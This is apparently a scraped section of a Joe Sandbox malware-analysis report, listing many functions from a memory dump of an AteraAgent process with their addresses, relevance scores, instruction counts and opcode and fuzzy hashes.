                                                                                                                                                                                                                                                                            • Opcode ID: 3948d7d4fbb998fd528803ffa9db39bec6a4f88e400f5e60dea20587f79b9281
                                                                                                                                                                                                                                                                            • Instruction ID: f819e1ca15d26cdc864be8fdfaac7adbfdffc049702ca65f3d3d30bf83e98324
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3948d7d4fbb998fd528803ffa9db39bec6a4f88e400f5e60dea20587f79b9281
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E016672A1AF8D9FF358AB2CC8751FDBF90EF46251F0400B6D05CC31B2D92028098782
                                                                                                                                                                                                                                                                            Function 00007FFAAB478413 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6c866dc47c7a58af0cad1a006fa0b85c4966797af125b855396175301c414024
                                                                                                                                                                                                                                                                            • Instruction ID: ab555258aa8b27d24038ced038437a547d2dde4e90453c47b76681f6e0f1b5c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c866dc47c7a58af0cad1a006fa0b85c4966797af125b855396175301c414024
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C01AF72B0DD1C8FE6D8EA1DE899A7437E2EBA936031405E7D44DC7662E912EC428781
                                                                                                                                                                                                                                                                            Function 00007FFAAB4652FD Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f4351cffc3511adce6a810565a582695fe70e10090b582280f3e78ee0472b343
                                                                                                                                                                                                                                                                            • Instruction ID: d789892ff8ee1c01a0b80c0021ac6d893c735d465e1de4785efb67438740d4ff
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4351cffc3511adce6a810565a582695fe70e10090b582280f3e78ee0472b343
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C01263284E3C99FD302AB3098620E5BFA4DF07244F0841AAE04CCB1A3C959164EC392
                                                                                                                                                                                                                                                                            Function 00007FFAAB4709A9 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 11918a7d0da4a09d6ff02a201314ddb4202037efb224d617bb5cf338b683e684
                                                                                                                                                                                                                                                                            • Instruction ID: 90cc10ab18f4bea8271bf9db06fcb1805bddab90d55f2ac947ab6fd86c87e5fc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11918a7d0da4a09d6ff02a201314ddb4202037efb224d617bb5cf338b683e684
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3301D43110EBC89FD38793289820661BFE0EF97214F4901EBE488CB2A3D9569805C392
                                                                                                                                                                                                                                                                            Function 00007FFAAB4779B1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dd285021fa763ea025c209fe0efeafa63a2c5f859c901d0d11f2506376ec574a
                                                                                                                                                                                                                                                                            • Instruction ID: 2411814ce04d6bac468718bf2c3f66182e9807135654ea7f594d941680324c3a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd285021fa763ea025c209fe0efeafa63a2c5f859c901d0d11f2506376ec574a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42F0242270E9880FE398A62CAC5D9723FD4DB6A13230502FFE84CC7173F9069846C384
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C765 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 456e02ec67a9dcb36e51ac103c57b5bf16157597e956a5d6cda729f566403aa2
                                                                                                                                                                                                                                                                            • Instruction ID: e4ece2191904207a89738605cb5dc67849e1db40a0723a0cecf5e846258e3696
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 456e02ec67a9dcb36e51ac103c57b5bf16157597e956a5d6cda729f566403aa2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA01A221A1DA494FE384D71CD4A97B5B7D1EF5A355B1800FAD40CC72B7DE19AC848741
                                                                                                                                                                                                                                                                            Function 00007FFAAB473230 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5110dc98388a8679d2bcdbee1c289c5ab7820e792a4f3fd908dcb8e199ec7477
                                                                                                                                                                                                                                                                            • Instruction ID: ef7865a8dd0669531a1fba0ebfef8b825d8177a532e7e07201d15a56e01ca2e1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5110dc98388a8679d2bcdbee1c289c5ab7820e792a4f3fd908dcb8e199ec7477
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C01D230909B488FD795EB289048A7A7BE1EFD5344F14497EE88DC7371CA34A889C782
                                                                                                                                                                                                                                                                            Function 00007FFAAB4891F1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 45a95475642169b79e6404a5da3e3ccbc68714b610fef224ac0a90d6a8e3d624
                                                                                                                                                                                                                                                                            • Instruction ID: 45f180ccf239b4567bf5ae49353413518d066ee63928736e6b75c88afe27b214
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45a95475642169b79e6404a5da3e3ccbc68714b610fef224ac0a90d6a8e3d624
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F0D19264FBC65FE34683AC68561B47F80DB97170B4891FBC18CCA4A3D809588A4297
                                                                                                                                                                                                                                                                            Function 00007FFAAB46AE30 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 70aa78b5da638b93e1b18057816530474b73d036606ba1039e1905081eff0420
                                                                                                                                                                                                                                                                            • Instruction ID: 27b290eb3a83a404dde657c07739d1c0a78580b944eaf261bff6af1f60ccbc44
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70aa78b5da638b93e1b18057816530474b73d036606ba1039e1905081eff0420
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0501D622B69E4A8FEB98EB2CC0509BAB3E1FFE53407444979D04DC3285DD28E8458780
                                                                                                                                                                                                                                                                            Function 00007FFAAB46BF80 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d65761621f3dfdf8909864cca5944e401dcad33712c71bae12434cf59771fed4
                                                                                                                                                                                                                                                                            • Instruction ID: 99a84c16bf1e6ed533fad1e771f34fa3c180727685ccb68f0c8dd6f52864a974
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d65761621f3dfdf8909864cca5944e401dcad33712c71bae12434cf59771fed4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB01D662B29E0B8FEA98EB28C4519B6B3E1FFE434074445BAD04DC3295DE28E8414781
                                                                                                                                                                                                                                                                            Function 00007FFAAB464228 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1a50a8644706c0155e404edfac38b266d1edcae26ddc739d22aeb1beeb6efa27
                                                                                                                                                                                                                                                                            • Instruction ID: e9b49e0b9ba46732ff69db7449a83df7275cd041ead4b040555036cd8282199a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a50a8644706c0155e404edfac38b266d1edcae26ddc739d22aeb1beeb6efa27
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAF09035D4951D8BEB20AF95A4403F9F7B4EB43394F14203AD40CA7150E77A9999CB89
                                                                                                                                                                                                                                                                            Function 00007FFAAB47D17D Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 59d97a1978258ce5e94236377754d7e2b2c08af5e16d1a2c51998a259476573e
                                                                                                                                                                                                                                                                            • Instruction ID: 4419e551d21205eb4abc34b8412144c4cc8f01d66ced2f880fb1a81e55f1ea39
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59d97a1978258ce5e94236377754d7e2b2c08af5e16d1a2c51998a259476573e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4401814586FBC69FE363637818602B16FA58E4716470D41E7E0CCCA0E7D84C58AAC3D6
                                                                                                                                                                                                                                                                            Function 00007FFAAB464B89 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3344147a8b46155937bdb58a58e502715520c44d76804c586f9729daa9e7a0ea
                                                                                                                                                                                                                                                                            • Instruction ID: e283693751ad96dc29f03bfb7cbc418966e7e1c83049dd6f3d47f12ab94fafc9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3344147a8b46155937bdb58a58e502715520c44d76804c586f9729daa9e7a0ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2101A76180D7C9AFE746A778C8652ED7FB0EF47240F5501F7D048CB0B3DA2819498352
                                                                                                                                                                                                                                                                            Function 00007FFAAB46AF99 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cec2a30eee26e9b806bb8e21659e3cfc76865a025d8c0c7a14c1fd5aa2ae5dec
                                                                                                                                                                                                                                                                            • Instruction ID: c720cc11b6496e6a20b6d8c752c0ba466a0fe5137dba9f328a69f6e2018b2bca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cec2a30eee26e9b806bb8e21659e3cfc76865a025d8c0c7a14c1fd5aa2ae5dec
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C90181B1919BCE8FEB45EF68C8645F97FF0FF56200B4404ABD458C71A2DA745914C741
                                                                                                                                                                                                                                                                            Function 00007FFAAB46D2D0 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7b65d77c78a0c4ad0ebe94435760a4a2f26c3296933aeeacfdc3e62654a44aaa
                                                                                                                                                                                                                                                                            • Instruction ID: fa9342646f6c04b9d57dfc99862f3be61d25a16b12f484bfbc4387ae40d40abe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b65d77c78a0c4ad0ebe94435760a4a2f26c3296933aeeacfdc3e62654a44aaa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35F0843120AA8C8FD784922CE800B22BBE5EBD7354F1401BAF80CD73A0C8269805C3C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB470B02 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 970bb19dabd4e50f734a6cf1c644cfa3f2fb7ec52447901dbc2afdfd9cb94ffe
                                                                                                                                                                                                                                                                            • Instruction ID: f9d4a3bee2ad204913cd6e5325e45688fd5a8f2ba91870451938166d89ed2520
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 970bb19dabd4e50f734a6cf1c644cfa3f2fb7ec52447901dbc2afdfd9cb94ffe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF0FF2050EACA4FE31A977C84545A0BFE1EF46350B4C41F6D48CCB2A3DA18A989C392
                                                                                                                                                                                                                                                                            Function 00007FFAAB4893F3 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f878dcf3b4203d03dce94d668943cfc1cace420e14d54046002fc5f1e3afe5e3
                                                                                                                                                                                                                                                                            • Instruction ID: cb49025b6e6c9cbf98be3415815f808120361a8fcde423453b1ac9b18a432fae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f878dcf3b4203d03dce94d668943cfc1cace420e14d54046002fc5f1e3afe5e3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80F0A76272DA1C8FA558BB4C24031F873C2EB8B960B10846FD09FC3157DD25680F43C6
                                                                                                                                                                                                                                                                            Function 00007FFAAB464B1D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 587b7326d0229ecab6b1bbea03793edcd5cac3d11116067fdff0c8b131df64d3
                                                                                                                                                                                                                                                                            • Instruction ID: b2d41d8292956e6bc07e2bfca9e0cc1c3668bbc91058f28b22f23436648a318f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 587b7326d0229ecab6b1bbea03793edcd5cac3d11116067fdff0c8b131df64d3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901F93080A68DCFDB44EF24D8613E97BA1FF56300F414879E40CC7292DA79E854C780
                                                                                                                                                                                                                                                                            Function 00007FFAAB484A43 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5dda0845c42fcecae68911ffe37fd554084e10923fb2dca3279af659d6a6cebf
                                                                                                                                                                                                                                                                            • Instruction ID: 989e8e12827799457ddf09c9087667edec18ef9aa00de4d8042ece4d9e53db0a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dda0845c42fcecae68911ffe37fd554084e10923fb2dca3279af659d6a6cebf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0FE7192CB088B9F486F0CBC434B977E0FB89B60F10515FF94943251D621B8958AC7
                                                                                                                                                                                                                                                                            Function 00007FFAAB465038 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: acae2007894ba82901d848d706f5f26b31a4dac2d782ec88a3104cf313f09497
                                                                                                                                                                                                                                                                            • Instruction ID: 63963afcb26e8b0e5e5166cc85577085709ce2de8b7fb1e7ba52bf9e45cff227
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acae2007894ba82901d848d706f5f26b31a4dac2d782ec88a3104cf313f09497
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F01D71E05A2E8FDBA4EE58D851AA9B371EB4A250F0041B6D00DD3251CE3599458B81
                                                                                                                                                                                                                                                                            Function 00007FFAAB474F25 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 63b5b56b04b310e635da3f2fdccb691cb878208d1327ab05d02bb3ab9597e772
                                                                                                                                                                                                                                                                            • Instruction ID: a3323938f81061597ec12b3d59e5d18d8c6f8cd084226e7e6d84e3b93029556d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63b5b56b04b310e635da3f2fdccb691cb878208d1327ab05d02bb3ab9597e772
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF0E23181AA4B8FD359DB2884456A477E0FF19350B4941AAD44CCB2A3EA29ECD9C7C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB484A7D Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dbbf94b3661f057f40ee564c563fa0ae49d3d05fee3b4452cf461a02287d7e39
                                                                                                                                                                                                                                                                            • Instruction ID: 2f582e5354160178cf3a8bd1133684ae362b3b3717ebcce80990cefd8ee161d3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbbf94b3661f057f40ee564c563fa0ae49d3d05fee3b4452cf461a02287d7e39
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0E06D72A2CB048B9B085E0CA8030FD77D0EB89630F00022FE54A93651DA22B45246CB
                                                                                                                                                                                                                                                                            Function 00007FFAAB478FB4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6c61d725d45ca2b80783866b04e28ddbb4e78fb3dd7a0a8b6482a0b20356b68a
                                                                                                                                                                                                                                                                            • Instruction ID: c6ba111aec48ba38b850495f679b4f85cff3bb52061ab119b51486d0b0767693
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c61d725d45ca2b80783866b04e28ddbb4e78fb3dd7a0a8b6482a0b20356b68a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91F0B43630E9898FDB94CA48E4D4B657BE2FBA5310F4945A8C08CC7266C535DC49C7C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB48ABC1 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
